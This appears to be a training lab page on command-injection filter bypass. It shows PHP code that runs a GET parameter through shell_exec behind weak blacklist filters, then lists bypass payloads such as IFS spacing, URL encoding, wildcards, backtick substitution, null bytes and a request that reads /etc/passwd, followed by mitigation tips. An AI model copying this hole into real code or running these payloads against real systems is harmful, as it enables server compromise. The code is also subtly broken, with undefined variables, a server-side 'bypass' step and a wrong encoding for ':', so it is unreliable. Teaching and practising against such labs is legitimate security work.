Lab 5: Advanced Filter Bypass RCE

Difficulty: High

Lab Overview

This lab demonstrates advanced Remote Code Execution vulnerabilities where various filtering mechanisms are implemented but can be bypassed. The application applies different filters to user input but still allows RCE through creative bypass techniques.

Objective: Bypass the implemented filters and execute arbitrary commands using advanced techniques.

Vulnerable PHP Code

// Multiple filter implementations
function applyFilter($input, $type) {
    switch ($type) {
        case 'basic':
            return str_replace([';', '&', '|', '`', '$', '(', ')', '<', '>'], '', $input);
        case 'command_filter':
            $commands = ['cat', 'ls', 'whoami', 'id', 'uname'];
            foreach ($commands as $cmd) {
                $input = str_ireplace($cmd, '', $input);
            }
            return $input;
        case 'space_filter':
            return str_replace(' ', '', $input);
        case 'quote_filter':
            return str_replace(['"', "'", '`'], '', $input);
        default:
            return $input;
    }
}

// Bypass functions
function applyBypass($input, $technique) {
    switch ($technique) {
        case 'double_encoding':
            return str_replace(['%2f', '%3a'], ['%252f', '%253a'], $input);
        case 'unicode_encoding':
            return str_replace(['/', ':'], ['%c0%af', '%c0%ae'], $input);
        case 'command_substitution':
            return str_replace(['ls', 'cat'], ['`ls`', '`cat`'], $input);
        default:
            return $input;
    }
}

// Vulnerable processing
if (isset($_GET['cmd'])) {
    $command = $_GET['cmd'];
    $filtered_command = applyFilter($command, $filter_type);
    $bypassed_command = applyBypass($filtered_command, $bypass_technique);
    $output = shell_exec($bypassed_command . ' 2>&1');
}

Advanced Filter Bypass Demo

Filter Type

Bypass Technique

Command to Execute

Quick Test Commands:

Vulnerability Details

Type: Advanced Remote Code Execution (RCE)
Severity: Critical
Parameter: cmd
Method: GET
Issue: Inadequate filtering mechanisms

Bypass Payloads by Filter

Basic Filter Bypasses:

whoami - Direct command
w%68oami - Character encoding
w**oami - Wildcard substitution

Space Filter Bypasses:

ls${IFS}-la - IFS variable
ls%20-la - URL encoding
ls%09-la - Tab character

Command Filter Bypasses:

c%61t - Character encoding
c**t - Wildcard substitution
`cat` - Command substitution

Current Filter: None

Try different bypass techniques based on the active filter:

Basic Filter: Removes common injection characters - Try encoding or alternative characters
Command Filter: Removes common commands - Try encoding or wildcards
Space Filter: Removes spaces - Try IFS, tabs, or encoding
Quote Filter: Removes quotes - Try alternative quote characters
Encoding Filter: Applies URL decoding - Try double encoding
Length Filter: Limits length - Try short commands or chaining

Advanced Bypass Techniques

Try these advanced bypass techniques:

whoami - Direct command execution
w%68oami - Character encoding bypass
ls${IFS}-la - IFS variable for spaces
c%61t%20/etc/passwd - URL encoding bypass
`whoami` - Command substitution
w**oami - Wildcard substitution
w%00hoami - Null byte injection

Quick Test URLs

Click these links to test different bypass techniques:

Advanced Attack Scenarios

Bypassing WAF and security filters
Advanced encoding and obfuscation techniques
Protocol confusion attacks
Multi-stage payload delivery
Context-aware injection attacks
Client-side security control bypasses
Privilege escalation and persistence

Advanced Mitigation Strategies

Implement multiple layers of validation and sanitization
Use whitelist-based validation instead of blacklists
Normalize and canonicalize input before validation
Implement proper command validation and restriction
Use least privilege principles
Implement proper error handling
Regular security testing and filter updates
Consider using a WAF (Web Application Firewall)
Implement network segmentation and access controls